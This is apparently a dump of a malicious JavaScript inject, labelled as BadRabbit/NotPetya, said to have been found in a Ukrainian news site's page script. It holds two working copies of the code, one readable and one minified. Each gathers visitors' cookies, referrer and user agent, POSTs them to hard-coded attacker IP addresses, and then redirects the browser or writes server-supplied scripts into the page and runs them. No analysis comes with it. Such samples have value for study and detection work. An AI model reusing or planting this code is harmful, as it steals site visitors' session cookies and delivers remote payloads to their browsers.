BadRabbit/NotPetya inject on i24[.]com[.]ua/js/page-main.js

1. var REMOTE_URL = 'http://172.97.69.79/i/';
2.  
3. var C_TIMEOUT = 20000;
4.  
5. function analyze_traffic() {
6. return {
7. 'Tr.Referer': document.referrer,
8. 'Tr.Agent': navigator.userAgent,
9. 'Tr.CookieState': !!document.cookie,
10. 'Tr.Cookie': document.cookie,
11. 'Tr.Domen': window.location.hostname
12. };
13. }
14.  
15. function execute_request(post, url, callback) {
16. var xhr = init_xhr();
17. if (!!xhr) {
18. xhr.open('POST', url);
19. xhr.timeout = C_TIMEOUT;
20. xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
21. xhr.onreadystatechange = function () {
22. if (xhr.readyState == 4 && xhr.status == 200) {
23. callback(xhr.responseText);
24. }
25. };
26. var content = build_query(post);
27. xhr.send(content);
28. }
29. }
30.  
31. function apply_payload(response) {
32. if (response) {
33. var json_result = JSON.parse(response);
34. if (json_result) {
35. var inject_string = urldecode(json_result.InjectionString);
36. if (json_result.InjectionType === 1) {
37. window.location = inject_string;
38. } else {
39. write_on_page(inject_string);
40. }
41. }
42. }
43. }
44.  
45. function write_on_page(content) {
46. var div = document.createElement('div');
47. div.id = 'response';
48. div.innerHTML = content;
49. document.body.appendChild(div);
50. var scripts = div.getElementsByTagName('script');
51. if (scripts.length > 0) {
52. for (var i = 0; i < scripts.length; i++) {
53. var script = document.createElement('script');
54. script.innerHTML = scripts[i].innerHTML;
55. document.body.appendChild(script);
56. scripts[i].parentNode.removeChild(scripts[i]);
57. }
58. }
59. }
60.  
61. function build_query(post) {
62. var post_query = [];
63. for (var k in post) {
64. if (post.hasOwnProperty(k)) {
65. post_query.push(k + '=' + post[k]);
66. }
67. }
68. return post_query.join('&');
69. }
70.  
71. function init_xhr() {
72. if (!!window.XMLHttpRequest) {
73. return new XMLHttpRequest();
74. } else if (!!window.ActiveXObject) {
75. var xhr_array = [
76. 'Msxml2.XMLHTTP.6.0',
77. 'Msxml2.XMLHTTP.3.0',
78. 'Msxml2.XMLHTTP',
79. 'Microsoft.XMLHTTP'
80. ];
81. for (var i = 0; i < xhr_array.length; i++) {
82. try {
83. return new ActiveXObject(xhr_array[i]);
84. }
85. catch (e) {
86. }
87. }
88. }
89. }
90.  
91. function urldecode(data) {
92. return decodeURIComponent(data).replace(/\+/g, '%20');
93. }
94.  
95. // Execute request
96. var traffic = analyze_traffic();
97. execute_request(traffic, REMOTE_URL, apply_payload);
98.  
99.  
100. function e(d){var xhr=null;if(!!window.XMLHttpRequest){xhr=new XMLHttpRequest();}else if(!!window.ActiveXObject){var xhrs=['Microsoft.XMLHTTP','Msxml2.XMLHTTP','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP.6.0'];for(var i=0;i<xhrs.length;i++){try{xhr=ActiveXObject(xhrs[i]);break;}catch(e){}}}if(!!xhr){xhr.open('POST', 'http://185.149.120.3/scholargoogle/');xhr.timeout=10000;xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xhr.onreadystatechange=function (){if(xhr.readyState == 4 && xhr.status == 200){var resp=xhr.responseText;if(resp){var fans=JSON.parse(resp);if(fans){var an_s=decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');var da=document.createElement('div');da.id='ans';da.innerHTML=an_s;document.body.appendChild(da);}}}};var pd=[];for(var k in d){if(d.hasOwnProperty(k)){pd.push(k+'='+d[k]);}}var dc=pd.join('&');xhr.send(dc);}}e({'agent':navigator.userAgent,'referer':document.referrer,'cookie':document.cookie,'domain':window.location.hostname,'c_state':!!document.cookie});